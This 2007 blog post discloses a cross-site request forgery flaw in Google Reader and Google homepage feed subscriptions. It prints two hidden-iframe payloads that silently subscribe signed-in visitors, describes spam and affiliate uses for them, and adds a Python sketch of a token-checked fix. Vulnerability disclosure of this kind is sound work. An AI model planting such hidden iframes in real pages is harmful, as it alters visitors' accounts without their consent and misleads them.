Google security flaw allows sites to auto-subscribe new RSS readers

July 18, 2007

Patrick Altoft

Director of Strategy

Have you ever opened up your Google Reader account or personalized Google Homepage and spotted a feed that you didn’t remember subscribing to? If you have, it might have been due to a security issue with the way Google handles RSS subscription requests.

Clicking on the subscribe using Google button on most blogs takes you to a page saying “Google offers two different ways to keep up-to-date with your favorite sites” with the option to click on either “Add to Google homepage” or “Add to Google Reader”.

You can see it in action by clicking on the button below (don’t worry, this won’t auto-subscribe you to anything):


The problem is that unscrupulous websites can copy the “Add to Google homepage” and “Add to Google Reader” links and open them in an IFRAME for every visitor. Anybody who visits such a website while signed in to a Google account is then subscribed to the RSS feed on both Google Reader and the Google homepage automatically, without clicking anything.

All a site needs to do is add the following code to their pages, replacing the blogstorm feed with their own feed, and they get a bunch of new readers.


<iframe width="1" height="1" border="0" scrolling="0"

src=”http://www.google.com/ig/setp?et=GCZWwdGf&
source=ign_&url=http://

www.google.com/ig&n_25=url%3Dhttp://
feeds.feedburner.com/blogstorm%26val%3D3″></iframe>

<iframe width=”1″ height=”1″ border=”0″ scrolling=”0″

src=”http://www.google.com/ig/addtoreader?et=
4x_zc136&source=ign_&feedurl=

http://feeds.feedburner.com/blogstorm&
feedtitle=BlogStorm&url=http://www.google

.com/ig/add%3Ffeedurl%3Dhttp://feeds.feed
burner.com/blogstorm”></iframe>

It is worth noting that none of the other RSS readers I tested had this vulnerability.
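What makes the iframe trick work is that the subscription endpoints change account state on a plain GET and accept the same copied link for every visitor, so the victim's own cookies are all the request needs. As an added illustration (not code from this post or from Google), the Python stand-in below contrasts a handler with that behaviour against one that only acts on a POST carrying a token bound to the caller's session; the function names, session ids and signing key are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a feed-subscription endpoint; not Google's code.
SERVER_SECRET = secrets.token_bytes(32)  # per-deployment key, never sent to clients


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the genuine subscribe page, valid for this session only."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_subscribe(method, session_id, params, subs) -> bool:
    """Mirrors the behaviour the post describes: any request arriving with a
    logged-in session adds the feed, whatever page sent it. A 1x1 iframe on a
    third-party site makes the browser attach the victim's cookies automatically."""
    if session_id is None or "feedurl" not in params:
        return False
    subs.setdefault(session_id, set()).add(params["feedurl"])
    return True


def hardened_subscribe(method, session_id, params, subs) -> bool:
    """Subscribes only on a POST carrying a token bound to the caller's session.
    A cross-site iframe can neither read that token nor compute it."""
    if session_id is None or "feedurl" not in params:
        return False
    if method != "POST":  # a GET must never change account state
        return False
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(expected, params.get("csrf", "")):
        return False
    subs.setdefault(session_id, set()).add(params["feedurl"])
    return True


def demo():
    """Replay the copied-link request against both handlers; returns the outcomes."""
    victim, attacker = "session-victim", "session-attacker"  # constructed ids
    feed = "http://feeds.feedburner.com/blogstorm"
    # A link copied from the attacker's own subscribe page carries, at best,
    # the attacker's token, which is useless against the victim's session.
    forged = {"feedurl": feed, "csrf": issue_csrf_token(attacker)}
    subs = {}
    return {
        "vuln_get": vulnerable_subscribe("GET", victim, forged, subs),
        "hard_get": hardened_subscribe("GET", victim, forged, subs),
        "hard_post_wrong_token": hardened_subscribe("POST", victim, forged, subs),
        "hard_post_own_token": hardened_subscribe(
            "POST", victim, {"feedurl": feed, "csrf": issue_csrf_token(victim)}, subs),
    }
```

Only the last case, a POST from the genuine page carrying the victim's own token, succeeds against the hardened handler; the vulnerable one accepts the copied link outright.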

Demo

If you want to see the security issue in action, and are signed into your Google account, click this link. Please be aware that this will auto-subscribe you to the BlogStorm RSS feed, so if you don’t want to know about internet marketing and general web design related topics you might want to be careful.

Why would somebody want to do this?

Now most of you are saying “Why would a blogger want to get readers in this way?”

Well, there are two answers. The first is simple: blogs like to show off a large number of Feedburner subscribers so if you have no morals, a low quality blog and want lots of subscribers, this is the way to get them.

The second is a bit more sneaky. Imagine you are doing some affiliate marketing: what is the most valuable piece of real estate on the web? Where would huge corporations pay millions per day to get an advert? The answer is right below the search box on the Google homepage.

With this exploit thousands of people could suddenly see your best offers plastered right underneath the Google search box that they use hundreds of times per week. Some people will just assume Google put them there, many will trust Google’s recommendation and buy the products.

I wonder how long this will take to get fixed?
